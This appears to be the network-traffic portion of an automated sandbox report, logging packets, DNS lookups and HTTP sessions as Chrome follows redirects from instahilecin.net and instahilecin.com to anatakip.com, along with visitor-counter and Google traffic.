                    May 27, 2024 00:58:39.947429895 CEST49880443192.168.2.5104.21.27.83
                    May 27, 2024 00:58:40.305983067 CEST44349882104.22.75.171192.168.2.5
                    May 27, 2024 00:58:40.306260109 CEST49882443192.168.2.5104.22.75.171
                    May 27, 2024 00:58:40.306274891 CEST44349882104.22.75.171192.168.2.5
                    May 27, 2024 00:58:40.306756020 CEST44349882104.22.75.171192.168.2.5
                    May 27, 2024 00:58:40.307075977 CEST49882443192.168.2.5104.22.75.171
                    May 27, 2024 00:58:40.307161093 CEST44349882104.22.75.171192.168.2.5
                    May 27, 2024 00:58:40.307230949 CEST49882443192.168.2.5104.22.75.171
                    May 27, 2024 00:58:40.350488901 CEST44349882104.22.75.171192.168.2.5
                    May 27, 2024 00:58:40.352148056 CEST44349883104.22.75.171192.168.2.5
                    May 27, 2024 00:58:40.352407932 CEST49883443192.168.2.5104.22.75.171
                    May 27, 2024 00:58:40.352420092 CEST44349883104.22.75.171192.168.2.5
                    May 27, 2024 00:58:40.352757931 CEST44349883104.22.75.171192.168.2.5
                    May 27, 2024 00:58:40.353189945 CEST49883443192.168.2.5104.22.75.171
                    May 27, 2024 00:58:40.353240967 CEST44349883104.22.75.171192.168.2.5
                    May 27, 2024 00:58:40.353347063 CEST49883443192.168.2.5104.22.75.171
                    May 27, 2024 00:58:40.394493103 CEST44349883104.22.75.171192.168.2.5
                    May 27, 2024 00:58:40.515595913 CEST44349882104.22.75.171192.168.2.5
                    May 27, 2024 00:58:40.515657902 CEST44349882104.22.75.171192.168.2.5
                    May 27, 2024 00:58:40.515899897 CEST49882443192.168.2.5104.22.75.171
                    May 27, 2024 00:58:40.516733885 CEST49882443192.168.2.5104.22.75.171
                    May 27, 2024 00:58:40.516746044 CEST44349882104.22.75.171192.168.2.5
                    May 27, 2024 00:58:40.516756058 CEST49882443192.168.2.5104.22.75.171
                    May 27, 2024 00:58:40.516792059 CEST49882443192.168.2.5104.22.75.171
                    May 27, 2024 00:58:40.517534018 CEST49886443192.168.2.5104.22.74.171
                    May 27, 2024 00:58:40.517563105 CEST44349886104.22.74.171192.168.2.5
                    May 27, 2024 00:58:40.517663956 CEST49886443192.168.2.5104.22.74.171
                    May 27, 2024 00:58:40.517945051 CEST49886443192.168.2.5104.22.74.171
                    May 27, 2024 00:58:40.517956972 CEST44349886104.22.74.171192.168.2.5
                    May 27, 2024 00:58:40.554987907 CEST44349883104.22.75.171192.168.2.5
                    May 27, 2024 00:58:40.555061102 CEST44349883104.22.75.171192.168.2.5
                    May 27, 2024 00:58:40.555111885 CEST49883443192.168.2.5104.22.75.171
                    May 27, 2024 00:58:40.556083918 CEST49883443192.168.2.5104.22.75.171
                    May 27, 2024 00:58:40.556097031 CEST44349883104.22.75.171192.168.2.5
                    May 27, 2024 00:58:40.654459953 CEST44349851172.217.16.196192.168.2.5
                    May 27, 2024 00:58:40.654536009 CEST44349851172.217.16.196192.168.2.5
                    May 27, 2024 00:58:40.654645920 CEST49851443192.168.2.5172.217.16.196
                    May 27, 2024 00:58:40.849004030 CEST49851443192.168.2.5172.217.16.196
                    May 27, 2024 00:58:40.849029064 CEST44349851172.217.16.196192.168.2.5
                    May 27, 2024 00:58:41.036102057 CEST44349886104.22.74.171192.168.2.5
                    May 27, 2024 00:58:41.036452055 CEST49886443192.168.2.5104.22.74.171
                    May 27, 2024 00:58:41.036469936 CEST44349886104.22.74.171192.168.2.5
                    May 27, 2024 00:58:41.037611961 CEST44349886104.22.74.171192.168.2.5
                    May 27, 2024 00:58:41.039025068 CEST49886443192.168.2.5104.22.74.171
                    May 27, 2024 00:58:41.039182901 CEST49886443192.168.2.5104.22.74.171
                    May 27, 2024 00:58:41.039203882 CEST44349886104.22.74.171192.168.2.5
                    May 27, 2024 00:58:41.083298922 CEST49886443192.168.2.5104.22.74.171
                    May 27, 2024 00:58:41.210458040 CEST44349886104.22.74.171192.168.2.5
                    May 27, 2024 00:58:41.215147018 CEST44349886104.22.74.171192.168.2.5
                    May 27, 2024 00:58:41.215198994 CEST49886443192.168.2.5104.22.74.171
                    May 27, 2024 00:58:41.215218067 CEST44349886104.22.74.171192.168.2.5
                    May 27, 2024 00:58:41.215333939 CEST44349886104.22.74.171192.168.2.5
                    May 27, 2024 00:58:41.215492964 CEST49886443192.168.2.5104.22.74.171
                    May 27, 2024 00:58:41.215544939 CEST49886443192.168.2.5104.22.74.171
                    May 27, 2024 00:58:41.215562105 CEST44349886104.22.74.171192.168.2.5
                    May 27, 2024 00:58:41.221725941 CEST49887443192.168.2.5104.22.74.171
                    May 27, 2024 00:58:41.221750021 CEST44349887104.22.74.171192.168.2.5
                    May 27, 2024 00:58:41.221801996 CEST49887443192.168.2.5104.22.74.171
                    May 27, 2024 00:58:41.222174883 CEST49887443192.168.2.5104.22.74.171
                    May 27, 2024 00:58:41.222182989 CEST44349887104.22.74.171192.168.2.5
                    May 27, 2024 00:58:41.436484098 CEST44349854142.250.186.100192.168.2.5
                    May 27, 2024 00:58:41.436563015 CEST44349854142.250.186.100192.168.2.5
                    May 27, 2024 00:58:41.436722040 CEST49854443192.168.2.5142.250.186.100
                    May 27, 2024 00:58:41.463578939 CEST49854443192.168.2.5142.250.186.100
                    May 27, 2024 00:58:41.463596106 CEST44349854142.250.186.100192.168.2.5
                    May 27, 2024 00:58:41.750695944 CEST44349887104.22.74.171192.168.2.5
                    May 27, 2024 00:58:41.751302004 CEST49887443192.168.2.5104.22.74.171
                    May 27, 2024 00:58:41.751317024 CEST44349887104.22.74.171192.168.2.5
                    May 27, 2024 00:58:41.751656055 CEST44349887104.22.74.171192.168.2.5
                    May 27, 2024 00:58:41.752368927 CEST49887443192.168.2.5104.22.74.171
                    May 27, 2024 00:58:41.752432108 CEST44349887104.22.74.171192.168.2.5
                    May 27, 2024 00:58:41.752688885 CEST49887443192.168.2.5104.22.74.171
                    May 27, 2024 00:58:41.798492908 CEST44349887104.22.74.171192.168.2.5
                    May 27, 2024 00:58:41.884995937 CEST44349887104.22.74.171192.168.2.5
                    May 27, 2024 00:58:41.885065079 CEST44349887104.22.74.171192.168.2.5
                    May 27, 2024 00:58:41.885121107 CEST44349887104.22.74.171192.168.2.5
                    May 27, 2024 00:58:41.885243893 CEST49887443192.168.2.5104.22.74.171
                    May 27, 2024 00:58:41.886162043 CEST49887443192.168.2.5104.22.74.171
                    May 27, 2024 00:58:41.886178970 CEST44349887104.22.74.171192.168.2.5
                    TimestampSource PortDest PortSource IPDest IP
                    May 27, 2024 00:57:26.575977087 CEST53547101.1.1.1192.168.2.5
                    May 27, 2024 00:57:26.631685019 CEST53550281.1.1.1192.168.2.5
                    May 27, 2024 00:57:28.673322916 CEST6260253192.168.2.51.1.1.1
                    May 27, 2024 00:57:28.673463106 CEST5435853192.168.2.51.1.1.1
                    May 27, 2024 00:57:29.360949993 CEST53543581.1.1.1192.168.2.5
                    May 27, 2024 00:57:29.384759903 CEST53626021.1.1.1192.168.2.5
                    May 27, 2024 00:57:29.659816980 CEST53543301.1.1.1192.168.2.5
                    May 27, 2024 00:57:30.018735886 CEST6333653192.168.2.51.1.1.1
                    May 27, 2024 00:57:30.018861055 CEST5030253192.168.2.51.1.1.1
                    May 27, 2024 00:57:30.021924019 CEST4940553192.168.2.51.1.1.1
                    May 27, 2024 00:57:30.022061110 CEST5854353192.168.2.51.1.1.1
                    May 27, 2024 00:57:30.115592957 CEST53494051.1.1.1192.168.2.5
                    May 27, 2024 00:57:30.115608931 CEST53585431.1.1.1192.168.2.5
                    May 27, 2024 00:57:30.115617037 CEST53633361.1.1.1192.168.2.5
                    May 27, 2024 00:57:30.115627050 CEST53503021.1.1.1192.168.2.5
                    May 27, 2024 00:57:30.807738066 CEST5286953192.168.2.51.1.1.1
                    May 27, 2024 00:57:30.807893991 CEST5542653192.168.2.51.1.1.1
                    May 27, 2024 00:57:30.863338947 CEST53554261.1.1.1192.168.2.5
                    May 27, 2024 00:57:30.863358974 CEST53528691.1.1.1192.168.2.5
                    May 27, 2024 00:57:33.259474993 CEST53517041.1.1.1192.168.2.5
                    May 27, 2024 00:57:33.584616899 CEST5446653192.168.2.51.1.1.1
                    May 27, 2024 00:57:33.584801912 CEST5350353192.168.2.51.1.1.1
                    May 27, 2024 00:57:33.639034033 CEST53544661.1.1.1192.168.2.5
                    May 27, 2024 00:57:33.639050007 CEST53535031.1.1.1192.168.2.5
                    May 27, 2024 00:57:34.234838009 CEST53579181.1.1.1192.168.2.5
                    May 27, 2024 00:57:34.393435955 CEST6052553192.168.2.51.1.1.1
                    May 27, 2024 00:57:34.393760920 CEST5013253192.168.2.51.1.1.1
                    May 27, 2024 00:57:34.408885002 CEST53605251.1.1.1192.168.2.5
                    May 27, 2024 00:57:34.408916950 CEST53522861.1.1.1192.168.2.5
                    May 27, 2024 00:57:34.408946991 CEST53501321.1.1.1192.168.2.5
                    May 27, 2024 00:57:35.089204073 CEST6395053192.168.2.51.1.1.1
                    May 27, 2024 00:57:35.089204073 CEST5597353192.168.2.51.1.1.1
                    May 27, 2024 00:57:35.140674114 CEST53559731.1.1.1192.168.2.5
                    May 27, 2024 00:57:35.140711069 CEST53639501.1.1.1192.168.2.5
                    May 27, 2024 00:57:35.421314955 CEST53596481.1.1.1192.168.2.5
                    May 27, 2024 00:57:38.682476997 CEST5760453192.168.2.51.1.1.1
                    May 27, 2024 00:57:38.683068991 CEST5510753192.168.2.51.1.1.1
                    May 27, 2024 00:57:38.712230921 CEST53576041.1.1.1192.168.2.5
                    May 27, 2024 00:57:38.712244034 CEST53551071.1.1.1192.168.2.5
                    May 27, 2024 00:57:41.751763105 CEST5403053192.168.2.51.1.1.1
                    May 27, 2024 00:57:41.751943111 CEST5286853192.168.2.51.1.1.1
                    May 27, 2024 00:57:41.752424955 CEST5257853192.168.2.51.1.1.1
                    May 27, 2024 00:57:41.752563953 CEST5200153192.168.2.51.1.1.1
                    May 27, 2024 00:57:41.843638897 CEST53528681.1.1.1192.168.2.5
                    May 27, 2024 00:57:41.843652010 CEST53525781.1.1.1192.168.2.5
                    May 27, 2024 00:57:41.843662024 CEST53540301.1.1.1192.168.2.5
                    May 27, 2024 00:57:41.843672037 CEST53520011.1.1.1192.168.2.5
                    May 27, 2024 00:57:42.903450012 CEST53552371.1.1.1192.168.2.5
                    May 27, 2024 00:57:43.226046085 CEST53552681.1.1.1192.168.2.5
                    May 27, 2024 00:57:43.226057053 CEST53564511.1.1.1192.168.2.5
                    May 27, 2024 00:57:45.124397039 CEST53550981.1.1.1192.168.2.5
                    May 27, 2024 00:57:48.714138031 CEST53493901.1.1.1192.168.2.5
                    May 27, 2024 00:57:49.457417011 CEST53608471.1.1.1192.168.2.5
                    May 27, 2024 00:57:49.633903027 CEST53604141.1.1.1192.168.2.5
                    May 27, 2024 00:58:08.352771997 CEST53563971.1.1.1192.168.2.5
                    May 27, 2024 00:58:12.105462074 CEST53562011.1.1.1192.168.2.5
                    May 27, 2024 00:58:25.912417889 CEST53604951.1.1.1192.168.2.5
                    May 27, 2024 00:58:31.537139893 CEST53554741.1.1.1192.168.2.5
                    May 27, 2024 00:58:31.544744968 CEST53536591.1.1.1192.168.2.5
                    May 27, 2024 00:58:33.856132984 CEST53494021.1.1.1192.168.2.5
                    May 27, 2024 00:58:34.779719114 CEST53543691.1.1.1192.168.2.5
                    May 27, 2024 00:58:36.505814075 CEST5678753192.168.2.51.1.1.1
                    May 27, 2024 00:58:36.506244898 CEST6319053192.168.2.51.1.1.1
                    May 27, 2024 00:58:36.573714018 CEST53631901.1.1.1192.168.2.5
                    May 27, 2024 00:58:36.573724985 CEST53567871.1.1.1192.168.2.5
                    May 27, 2024 00:58:38.803304911 CEST53617661.1.1.1192.168.2.5
                    TimestampSource IPDest IPChecksumCodeType
                    May 27, 2024 00:57:49.457484007 CEST192.168.2.51.1.1.1c21f(Port unreachable)Destination Unreachable
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    May 27, 2024 00:57:28.673322916 CEST192.168.2.51.1.1.10xede1Standard query (0)instahilecin.netA (IP address)IN (0x0001)false
                    May 27, 2024 00:57:28.673463106 CEST192.168.2.51.1.1.10x3598Standard query (0)instahilecin.net65IN (0x0001)false
                    May 27, 2024 00:57:30.018735886 CEST192.168.2.51.1.1.10x73acStandard query (0)instahilecin.comA (IP address)IN (0x0001)false
                    May 27, 2024 00:57:30.018861055 CEST192.168.2.51.1.1.10x6ecStandard query (0)instahilecin.com65IN (0x0001)false
                    May 27, 2024 00:57:30.021924019 CEST192.168.2.51.1.1.10x1f0cStandard query (0)www.google.comA (IP address)IN (0x0001)false
                    May 27, 2024 00:57:30.022061110 CEST192.168.2.51.1.1.10x3418Standard query (0)www.google.com65IN (0x0001)false
                    May 27, 2024 00:57:30.807738066 CEST192.168.2.51.1.1.10x60ccStandard query (0)anatakip.comA (IP address)IN (0x0001)false
                    May 27, 2024 00:57:30.807893991 CEST192.168.2.51.1.1.10x25ebStandard query (0)anatakip.com65IN (0x0001)false
                    May 27, 2024 00:57:33.584616899 CEST192.168.2.51.1.1.10x456aStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                    May 27, 2024 00:57:33.584801912 CEST192.168.2.51.1.1.10xf369Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                    May 27, 2024 00:57:34.393435955 CEST192.168.2.51.1.1.10xbf0cStandard query (0)whos.amung.usA (IP address)IN (0x0001)false
                    May 27, 2024 00:57:34.393760920 CEST192.168.2.51.1.1.10x4f1Standard query (0)whos.amung.us65IN (0x0001)false
                    May 27, 2024 00:57:35.089204073 CEST192.168.2.51.1.1.10xc1cbStandard query (0)widgets.amung.usA (IP address)IN (0x0001)false
                    May 27, 2024 00:57:35.089204073 CEST192.168.2.51.1.1.10x57acStandard query (0)widgets.amung.us65IN (0x0001)false
                    May 27, 2024 00:57:38.682476997 CEST192.168.2.51.1.1.10x961cStandard query (0)widgets.amung.usA (IP address)IN (0x0001)false
                    May 27, 2024 00:57:38.683068991 CEST192.168.2.51.1.1.10x7f99Standard query (0)widgets.amung.us65IN (0x0001)false
                    May 27, 2024 00:57:41.751763105 CEST192.168.2.51.1.1.10x8d17Standard query (0)www.google.comA (IP address)IN (0x0001)false
                    May 27, 2024 00:57:41.751943111 CEST192.168.2.51.1.1.10x23d0Standard query (0)www.google.com65IN (0x0001)false
                    May 27, 2024 00:57:41.752424955 CEST192.168.2.51.1.1.10x2e14Standard query (0)translate.google.comA (IP address)IN (0x0001)false
                    May 27, 2024 00:57:41.752563953 CEST192.168.2.51.1.1.10x6d8dStandard query (0)translate.google.com65IN (0x0001)false
                    May 27, 2024 00:58:36.505814075 CEST192.168.2.51.1.1.10x9c6cStandard query (0)anatakip.comA (IP address)IN (0x0001)false
                    May 27, 2024 00:58:36.506244898 CEST192.168.2.51.1.1.10x47cbStandard query (0)anatakip.com65IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    May 27, 2024 00:57:29.360949993 CEST1.1.1.1192.168.2.50x3598No error (0)instahilecin.net65IN (0x0001)false
                    May 27, 2024 00:57:29.384759903 CEST1.1.1.1192.168.2.50xede1No error (0)instahilecin.net104.21.72.53A (IP address)IN (0x0001)false
                    May 27, 2024 00:57:29.384759903 CEST1.1.1.1192.168.2.50xede1No error (0)instahilecin.net172.67.175.166A (IP address)IN (0x0001)false
                    May 27, 2024 00:57:30.115592957 CEST1.1.1.1192.168.2.50x1f0cNo error (0)www.google.com172.217.16.196A (IP address)IN (0x0001)false
                    May 27, 2024 00:57:30.115608931 CEST1.1.1.1192.168.2.50x3418No error (0)www.google.com65IN (0x0001)false
                    May 27, 2024 00:57:30.115617037 CEST1.1.1.1192.168.2.50x73acNo error (0)instahilecin.com104.21.84.90A (IP address)IN (0x0001)false
                    May 27, 2024 00:57:30.115617037 CEST1.1.1.1192.168.2.50x73acNo error (0)instahilecin.com172.67.190.148A (IP address)IN (0x0001)false
                    May 27, 2024 00:57:30.115627050 CEST1.1.1.1192.168.2.50x6ecNo error (0)instahilecin.com65IN (0x0001)false
                    May 27, 2024 00:57:30.863338947 CEST1.1.1.1192.168.2.50x25ebNo error (0)anatakip.com65IN (0x0001)false
                    May 27, 2024 00:57:30.863358974 CEST1.1.1.1192.168.2.50x60ccNo error (0)anatakip.com104.21.27.83A (IP address)IN (0x0001)false
                    May 27, 2024 00:57:30.863358974 CEST1.1.1.1192.168.2.50x60ccNo error (0)anatakip.com172.67.141.216A (IP address)IN (0x0001)false
                    May 27, 2024 00:57:33.639034033 CEST1.1.1.1192.168.2.50x456aNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                    May 27, 2024 00:57:34.408885002 CEST1.1.1.1192.168.2.50xbf0cNo error (0)whos.amung.us104.22.75.171A (IP address)IN (0x0001)false
                    May 27, 2024 00:57:34.408885002 CEST1.1.1.1192.168.2.50xbf0cNo error (0)whos.amung.us104.22.74.171A (IP address)IN (0x0001)false
                    May 27, 2024 00:57:34.408885002 CEST1.1.1.1192.168.2.50xbf0cNo error (0)whos.amung.us172.67.8.141A (IP address)IN (0x0001)false
                    May 27, 2024 00:57:34.408946991 CEST1.1.1.1192.168.2.50x4f1No error (0)whos.amung.us65IN (0x0001)false
                    May 27, 2024 00:57:35.140674114 CEST1.1.1.1192.168.2.50x57acNo error (0)widgets.amung.us65IN (0x0001)false
                    May 27, 2024 00:57:35.140711069 CEST1.1.1.1192.168.2.50xc1cbNo error (0)widgets.amung.us104.22.74.171A (IP address)IN (0x0001)false
                    May 27, 2024 00:57:35.140711069 CEST1.1.1.1192.168.2.50xc1cbNo error (0)widgets.amung.us172.67.8.141A (IP address)IN (0x0001)false
                    May 27, 2024 00:57:35.140711069 CEST1.1.1.1192.168.2.50xc1cbNo error (0)widgets.amung.us104.22.75.171A (IP address)IN (0x0001)false
                    May 27, 2024 00:57:38.712230921 CEST1.1.1.1192.168.2.50x961cNo error (0)widgets.amung.us104.22.74.171A (IP address)IN (0x0001)false
                    May 27, 2024 00:57:38.712230921 CEST1.1.1.1192.168.2.50x961cNo error (0)widgets.amung.us172.67.8.141A (IP address)IN (0x0001)false
                    May 27, 2024 00:57:38.712230921 CEST1.1.1.1192.168.2.50x961cNo error (0)widgets.amung.us104.22.75.171A (IP address)IN (0x0001)false
                    May 27, 2024 00:57:38.712244034 CEST1.1.1.1192.168.2.50x7f99No error (0)widgets.amung.us65IN (0x0001)false
                    May 27, 2024 00:57:41.843638897 CEST1.1.1.1192.168.2.50x23d0No error (0)www.google.com65IN (0x0001)false
                    May 27, 2024 00:57:41.843652010 CEST1.1.1.1192.168.2.50x2e14No error (0)translate.google.comwww3.l.google.comCNAME (Canonical name)IN (0x0001)false
                    May 27, 2024 00:57:41.843652010 CEST1.1.1.1192.168.2.50x2e14No error (0)www3.l.google.com142.250.185.142A (IP address)IN (0x0001)false
                    May 27, 2024 00:57:41.843662024 CEST1.1.1.1192.168.2.50x8d17No error (0)www.google.com142.250.186.100A (IP address)IN (0x0001)false
                    May 27, 2024 00:57:41.843672037 CEST1.1.1.1192.168.2.50x6d8dNo error (0)translate.google.comwww3.l.google.comCNAME (Canonical name)IN (0x0001)false
                    May 27, 2024 00:57:42.094222069 CEST1.1.1.1192.168.2.50x2ea4No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                    May 27, 2024 00:57:42.094222069 CEST1.1.1.1192.168.2.50x2ea4No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                    May 27, 2024 00:57:42.646312952 CEST1.1.1.1192.168.2.50x5e4bNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                    May 27, 2024 00:57:42.646312952 CEST1.1.1.1192.168.2.50x5e4bNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                    May 27, 2024 00:57:57.509653091 CEST1.1.1.1192.168.2.50xb481No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                    May 27, 2024 00:57:57.509653091 CEST1.1.1.1192.168.2.50xb481No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                    May 27, 2024 00:58:23.981497049 CEST1.1.1.1192.168.2.50x7761No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                    May 27, 2024 00:58:23.981497049 CEST1.1.1.1192.168.2.50x7761No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                    May 27, 2024 00:58:36.573714018 CEST1.1.1.1192.168.2.50x47cbNo error (0)anatakip.com65IN (0x0001)false
                    May 27, 2024 00:58:36.573724985 CEST1.1.1.1192.168.2.50x9c6cNo error (0)anatakip.com172.67.141.216A (IP address)IN (0x0001)false
                    May 27, 2024 00:58:36.573724985 CEST1.1.1.1192.168.2.50x9c6cNo error (0)anatakip.com104.21.27.83A (IP address)IN (0x0001)false
                    May 27, 2024 00:58:41.846195936 CEST1.1.1.1192.168.2.50x89edNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                    May 27, 2024 00:58:41.846195936 CEST1.1.1.1192.168.2.50x89edNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                    • instahilecin.net
                    • instahilecin.com
                    • anatakip.com
                    • https:
                      • whos.amung.us
                      • widgets.amung.us
                      • translate.google.com
                      • www.google.com
                    • fs.microsoft.com
                    • a.nel.cloudflare.com
                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.549709104.21.72.534433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:29 UTC659OUTGET / HTTP/1.1
                    Host: instahilecin.net
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    sec-ch-ua-platform: "Windows"
                    Upgrade-Insecure-Requests: 1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: navigate
                    Sec-Fetch-User: ?1
                    Sec-Fetch-Dest: document
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:57:30 UTC644INHTTP/1.1 301 Moved Permanently
                    Date: Sun, 26 May 2024 22:57:29 GMT
                    Content-Type: text/html
                    Content-Length: 167
                    Connection: close
                    Cache-Control: max-age=3600
                    Expires: Sun, 26 May 2024 23:57:29 GMT
                    Location: https://instahilecin.com
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uET6YEsg%2FkNIZtfGqe33QQpYytCbCjFlBpFVawIuIHOyFjfgIfzP2zvYyFUI4eg7zeUiZab4Yxql5OSX1mJLqUEtCy2x3G017Ed%2Fw2ObD2RB%2BkDPoLgMH8eWNAjJRX1hC5AY"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15d523bac4327-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:30 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.549711104.21.84.904433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:30 UTC659OUTGET / HTTP/1.1
                    Host: instahilecin.com
                    Connection: keep-alive
                    Upgrade-Insecure-Requests: 1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: navigate
                    Sec-Fetch-User: ?1
                    Sec-Fetch-Dest: document
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    sec-ch-ua-platform: "Windows"
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:57:30 UTC642INHTTP/1.1 301 Moved Permanently
                    Date: Sun, 26 May 2024 22:57:30 GMT
                    Content-Type: text/html
                    Content-Length: 167
                    Connection: close
                    Cache-Control: max-age=3600
                    Expires: Sun, 26 May 2024 23:57:30 GMT
                    Location: https://anatakip.com
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EKe4Mcu%2BLjnuqjZgLhtdkP72lJKDiOZqr5atlExxrVqgj%2BsbOX300B8uogh5QzNwKgkW5l5K8BhTynw%2BQQBrl1TqmDtNwu1dhj9e3OIkFBdzhshg4GhK%2FdLeMh1MHzjUa0kJ"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15d572bf78c8a-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:30 UTC167INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.549715104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:31 UTC655OUTGET / HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    Upgrade-Insecure-Requests: 1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Sec-Fetch-Site: none
                    Sec-Fetch-Mode: navigate
                    Sec-Fetch-User: ?1
                    Sec-Fetch-Dest: document
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    sec-ch-ua-platform: "Windows"
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    2024-05-26 22:57:31 UTC829INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:57:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    set-cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; path=/; secure
                    expires: Thu, 19 Nov 1981 08:52:00 GMT
                    cache-control: no-store, no-cache, must-revalidate
                    pragma: no-cache
                    vary: Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AxDd9DLL%2FGOnzueRcGX6%2FgVyTf7VCQ8QHQMKL6hbjqoNrHnAndEFaMqMugsSatTynW0qOsxA8pxqkFQisk0Rt4VkegI3wOW6rLYNAw3ZtFnozkblWPWwxI%2FOYZOG8wo%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
